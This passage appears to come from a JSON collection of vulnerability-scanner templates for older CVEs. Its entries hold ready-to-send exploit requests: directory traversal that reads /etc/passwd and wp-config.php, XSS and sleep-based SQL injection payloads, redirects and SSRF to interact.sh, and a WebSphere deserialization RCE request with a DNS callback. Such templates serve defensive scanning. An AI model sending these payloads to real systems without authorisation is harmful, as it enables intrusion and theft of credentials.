Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Code Snippets"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-2794","info":{"name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Administrative Information","Database Information"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open 